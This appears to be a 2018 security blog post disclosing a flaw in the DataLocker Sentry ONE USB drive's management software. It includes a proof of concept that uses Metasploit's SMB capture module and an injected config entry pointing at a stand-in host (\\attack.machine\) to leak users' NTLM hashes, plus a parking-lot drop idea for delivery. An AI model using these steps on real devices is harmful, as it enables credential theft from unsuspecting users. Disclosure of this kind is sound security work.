Monday, September 17, 2018

Nabbing NTLM Hashes With DataLocker Sentry ONE Managed USB Drives

The DataLocker Sentry ONE Managed USB drive is a great, affordable, secure self encrypting device. It features AES256 full disk encryption with built in management software that includes a anti-malware scanner. It does how ever have at least one feature that if exploited can lead to the users NTLM hashes being sent to any address the attacker chooses.

I found that the DataLocker Simply Secure device management software can be used to send the current users NTLM hash to any remote server an attacker chooses with no interaction from the user and without the users knowledge. The user simply has to run the unlock software and input the correct password, which auto launches the management software, triggering a SMB call.


This vulnerability depends on an insider threat or malware. You could drop these in a parking lot and put the password in the cap on a small piece or paper or something. Because its password protected, people might be more likely to want to check it out.

PoC:
Set up SMB server to prompt for domain credentials on connect. (Metasploit: auxiliary/server/capture/smb)
Edit management software config to include path to SMB server as an app. (Drive Letter:\.Apps\.apps.db)
Add content after AdditionalApplications tag:
                < Appl>
                                < Identifier>0< /Identifier>
                                < AppPath>\\attack.machine\< /AppPath>
                                < Args></ Args>
                                < IconPath></ IconPath>
                                < DisplayName></ DisplayName>
                                < Summary></ Summary>
                                < Url></ Url>
                                < InternalVersion>0< /InternalVersion>
                                < OS>0</ OS>
                < /Appl>
"Remove spaces"
Close and relock device. Move to another computer or re-run unlock software.
Authenticate to device, triggering SMB request.
View Metasploit for NTLM hash.

Why they would allow this, or just didn't think of it when they were developing the software, I dont know.

No comments: